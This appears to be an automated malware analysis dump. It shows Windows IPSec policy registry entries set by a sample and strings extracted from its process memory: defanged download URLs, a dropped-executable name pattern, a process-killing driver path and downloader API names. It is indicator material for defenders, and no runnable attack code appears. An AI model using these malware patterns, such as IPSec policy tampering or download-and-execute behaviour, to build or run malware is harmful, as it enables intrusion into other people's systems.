"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
%original file name%.exe_1696_rwx_00EA1000_00004000:
.text
h.rdata
H.data
.reloc
**************** Modified with PEditor 1.7 by yoda & M.o.D. -> come.to/f2f ****************
D:\DirectDiskForWin32\KillProcess\objfre_wxp_x86\i386\pcidump.pdb
ntoskrnl.exe
HAL.dll
\??\c:\%original file name%.exe
\??\%WinDir%\Explorer.EXE
ers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
\DosDevices\Scsi%d:
cc2178718.exe_744:
.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
ADVAPI32.dll
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
cc2178718.exe_744_rwx_00400000_00001000:
.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
svchost.exe_1236:
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512